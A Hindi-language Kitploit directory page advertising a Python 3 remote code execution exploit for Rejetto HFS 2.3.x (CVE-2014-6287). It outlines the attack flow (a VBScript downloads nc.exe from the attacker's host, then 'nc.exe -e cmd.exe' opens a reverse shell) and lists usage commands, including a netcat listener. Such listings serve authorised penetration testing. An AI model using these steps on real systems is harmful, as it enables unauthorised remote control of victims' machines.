Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
rejjeto_hfs-rce-exploit-cve-2014-6287 — Rejetto HTTP File Server 2.3.x (CVE-2014-6287) के लिए रिमोट कमांड निष्पादन शोषण, आधुनिक आक्रामक सुरक्षा परीक्षण के लिए Python 3 में पुनर्लिखित। | Kitploit
उपकरण/GitHubGitHub/joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारिमोट एक्सेस टूल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287

rejjeto_hfs-rce-exploit-cve-2014-6287

Rejetto HTTP File Server 2.3.x (CVE-2014-6287) के लिए रिमोट कमांड निष्पादन शोषण, आधुनिक आक्रामक सुरक्षा परीक्षण के लिए Python 3 में पुनर्लिखित।

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

HFS रिमोट कमांड एक्ज़ीक्यूशन एक्सप्लॉइट (CVE-2014-6287)

यह क्लासिक रिमोट कमांड एक्ज़ीक्यूशन (RCE) एक्सप्लॉइट का Python 3 पुनर्लेखन है जो Rejetto HTTP File Server (HFS) v2.3.x को लक्षित करता है, जो CVE-2014-6287 के रूप में पहचानी गई कमजोरी का लाभ उठाता है।

मूल रूप से Avinash Kumar Thapa उर्फ "-Acid" द्वारा खोजा गया, यह संस्करण पोर्टेबिलिटी और उपयोगिता में सुधार करता है, पूर्ण पैरामीटराइजेशन और आधुनिक अनुकूलता प्रदान करता है।


⚠️ अस्वीकरण

यह टूल विशेष रूप से शैक्षिक और अधिकृत पैठ परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उन सिस्टमों के खिलाफ अनधिकृत उपयोग जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।


📌 एक्सप्लॉइट विवरण

  • कमज़ोरी: Rejetto HFS v2.3.x - रिमोट कमांड एक्ज़ीक्यूशन
  • CVE: CVE-2014-6287
  • प्रभाव: सिस्टम विशेषाधिकारों के साथ रिमोट कोड निष्पादन
  • आवश्यकता: लक्ष्य स्क्रिप्टिंग सक्षम के साथ HFS का एक कमजोर संस्करण चला रहा होना चाहिए।

🚀 विशेषताएँ

  • Python 3 के साथ पूरी तरह से संगत
  • CLI के माध्यम से सभी प्रमुख पैरामीटर स्वीकार करता है:
    • लक्ष्य IP और पोर्ट
    • स्थानीय IP (हमलावर)
    • रिवर्स शेल के लिए सुनने का पोर्ट
    • nc.exe होस्ट करने के लिए उपयोग किया जाने वाला पोर्ट
  • कोई हार्डकोडेड मान नहीं
  • VBScript का उपयोग करके क्लासिक nc.exe रिवर्स शेल वितरण
  • एक्सप्लॉइट प्रवाह:
    1. nc.exe डाउनलोड करने के लिए एक VBScript अपलोड करें
    2. लक्ष्य पर VBScript निष्पादित करें
    3. रिवर्स शेल स्थापित करने के लिए nc.exe -e cmd.exe चलाएँ

🛠️ उपयोग

root@kitploit:~
python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>

Example:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000

Requirements:
  - HTTP server serving nc.exe:
      python3 -m http.server 8000
  - Listener:
      nc -lvnp 4444
टूल डाउनलोड करें